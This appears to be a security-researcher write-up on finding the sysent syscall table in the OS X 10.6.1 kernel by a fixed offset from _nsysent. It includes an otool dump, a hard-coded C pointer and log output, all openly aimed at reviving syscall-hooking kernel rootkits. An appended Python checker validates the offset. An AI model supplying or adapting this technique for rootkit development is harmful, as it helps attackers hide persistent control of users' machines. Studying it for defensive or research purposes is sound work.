Finding sysent on OS X 10.6.1
Written by Braeden Thomas

Regards to the gods of OS X security-dev: nemo, Landon Fuller and many others.

Darwin Kernel Version 10.0.0: root:xnu-1456.1.25~1/RELEASE_I386 i386

The latest release from Apple (Snow Leopard, 10.6.1) has broken most 10.5.* KEXT rootkits, primarily because the method provided by Landon Fuller has either been fixed by Apple or I have done something catastrophically wrong. I'm assuming there has been a problem with Apple implementing their KPI interfaces for kernel development, so I'm just going to say for now that a static pointer may be the only option [as far as I know at this point].

A quick search through the kernel shows a slightly different organisation of the sysent table compared with the Landon Fuller technique (32 bytes from the _nsysent export).

$ otool -d /mach_kernel
0082f020 00 00 00 00 ed 1e 49 00 00 00 00 00 00 00 00 00
0082f030 01 00 00 00 00 00 00 00 01 00 00 00 72 78 47 00
0082f040 b0 f0 4e 00 00 00 00 00 00 00 00 00 04 00 00 00
0082f050 00 00 00 00 74 95 47 00 00 00 00 00 00 00 00 00
00000000 ***********************************************
00831870 ae 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00

It's now located at -0x2850 from the _nsysent symbol. You'll notice _nosys (0x00491eed) and _exit (0x00477872) can be found here; the sysent table in 10.6.1 has 430 (0x01ae) syscalls in total.

And here's the magic code, which isn't really magic, primarily because it provides no sanity checks whatsoever. An OS X kernel panic is baaahd.
/* $ sysent.c */
/* $ Static Pointer to sysent on OS X 10.6.1 */
/* $ root:xnu-1456.1.25~1/RELEASE_I386 i386 */

#include "osxrt.h"

/* address of the _nsysent export in this exact kernel build */
#define _NSYSENT_OSX_10_6_1_ 0x00831870
/* distance from _nsysent back to the first sysent entry (_nosys) */
#define _NOSYS_OSX_10_6_1_   0x2850

/* hard-coded pointer; valid only for xnu-1456.1.25~1/RELEASE_I386 */
static struct sysent *_sysent = ( struct sysent * )( _NSYSENT_OSX_10_6_1_ - _NOSYS_OSX_10_6_1_ );

/* $ EOF */

A simple sanity check would be to read a few rows of the array and verify that the value returned from sy_narg matches the number of arguments that specific syscall actually takes.

It hath been found, once again!

$ tail -f /var/log/kernel.log
Sep 22 21:18:13 Homeground kernel[0]: _sysent: 0x82f020
Sep 22 21:18:13 Homeground kernel[0]: lstat64: 0x2e4ba3 2
Sep 22 21:18:13 Homeground kernel[0]: chdir: 0x2e89f3 1

So get rooting on OS X again; 2.6.* and Win32 aren't allowed to have all the fun.
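As an added example (not part of the write-up and not the author's code), the Python below reproduces the offset arithmetic offline from the otool -d lines quoted above and applies the sy_narg sanity check the write-up suggests, which is the same check an integrity monitor would run before trusting that it is reading the real table. It assumes the xnu-1456 i386 struct sysent layout (24-byte entries: int16 sy_narg, int8 sy_resv, int8 sy_flags, three 32-bit function pointers, int32 sy_return_type, uint16 sy_arg_bytes plus padding); that layout and the expected argument counts for nosys and exit are assumptions, and the input is the constructed dump copied from the write-up. It also shows one check the write-up's numbers support but do not spell out: 430 entries of 24 bytes is exactly 0x2850, so the offset is consistent with _nsysent sitting directly behind the table.

```python
import struct

# Constructed input: the otool -d lines quoted in the write-up. The '****'
# line is the author's elision marker and is skipped by the parser.
OTOOL_DUMP = """\
0082f020 00 00 00 00 ed 1e 49 00 00 00 00 00 00 00 00 00
0082f030 01 00 00 00 00 00 00 00 01 00 00 00 72 78 47 00
0082f040 b0 f0 4e 00 00 00 00 00 00 00 00 00 04 00 00 00
0082f050 00 00 00 00 74 95 47 00 00 00 00 00 00 00 00 00
00000000 ***********************************************
00831870 ae 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00
"""

NSYSENT_ADDR = 0x00831870   # _nsysent export, from the write-up
SYSENT_DELTA = 0x2850       # sysent = _nsysent - SYSENT_DELTA, from the write-up

# Assumed struct sysent layout for xnu-1456 (i386), little-endian, 24 bytes:
# int16 sy_narg, int8 sy_resv, int8 sy_flags, sy_call, sy_arg_munge32,
# sy_arg_munge64, int32 sy_return_type, uint16 sy_arg_bytes, 2 bytes pad.
SYSENT_FMT = "<hbbIIIiH2x"
SYSENT_SIZE = struct.calcsize(SYSENT_FMT)  # 24

# Assumed argument counts for the first two BSD syscalls (nosys, exit);
# only these two entries are fully covered by the quoted dump.
EXPECTED_NARG = {0: ("nosys", 0), 1: ("exit", 1)}


def parse_otool_dump(text):
    """Turn `otool -d` hex lines into an address -> byte dictionary."""
    mem = {}
    for line in text.splitlines():
        parts = line.split()
        # A real dump line is an address followed by two-hex-digit bytes.
        if len(parts) < 2 or not all(len(p) == 2 for p in parts[1:]):
            continue
        base = int(parts[0], 16)
        for i, byte in enumerate(parts[1:]):
            mem[base + i] = int(byte, 16)
    return mem


def read_bytes(mem, addr, n):
    """Read n contiguous bytes; raises KeyError if the dump lacks them."""
    return bytes(mem[addr + i] for i in range(n))


def read_sysent_entry(mem, table, idx):
    """Decode entry idx of the table at address `table`."""
    raw = read_bytes(mem, table + idx * SYSENT_SIZE, SYSENT_SIZE)
    narg, _resv, _flags, call, m32, m64, ret, argbytes = struct.unpack(SYSENT_FMT, raw)
    return {"sy_narg": narg, "sy_call": call, "sy_arg_munge32": m32,
            "sy_arg_munge64": m64, "sy_return_type": ret, "sy_arg_bytes": argbytes}


def locate_and_check(mem):
    """Compute the sysent address from _nsysent and sanity-check it."""
    nsysent = struct.unpack("<I", read_bytes(mem, NSYSENT_ADDR, 4))[0]
    table = NSYSENT_ADDR - SYSENT_DELTA
    # The delta should be exactly nsysent entries: the count follows the table.
    layout_ok = nsysent * SYSENT_SIZE == SYSENT_DELTA
    entries = {}
    narg_ok = True
    for idx, (name, want) in EXPECTED_NARG.items():
        entry = read_sysent_entry(mem, table, idx)
        entries[name] = entry
        narg_ok = narg_ok and entry["sy_narg"] == want
    return {"nsysent": nsysent, "sysent": table, "layout_ok": layout_ok,
            "narg_ok": narg_ok, "entries": entries}


if __name__ == "__main__":
    result = locate_and_check(parse_otool_dump(OTOOL_DUMP))
    print(f"_nsysent = {result['nsysent']} (0x{result['nsysent']:x}), "
          f"sysent @ 0x{result['sysent']:x}")
    for name, entry in result["entries"].items():
        print(f"  {name:6s} sy_call=0x{entry['sy_call']:08x} sy_narg={entry['sy_narg']}")
    print("layout check:", result["layout_ok"], " narg check:", result["narg_ok"])
```

Run against the quoted dump it reports _nsysent = 430, sysent at 0x82f020, the _nosys and _exit addresses the write-up names, and both checks passing. Feeding it a dump from a different kernel build should make the layout check fail before any entry is trusted, which is the behaviour a hard-coded pointer like the one above does not give you.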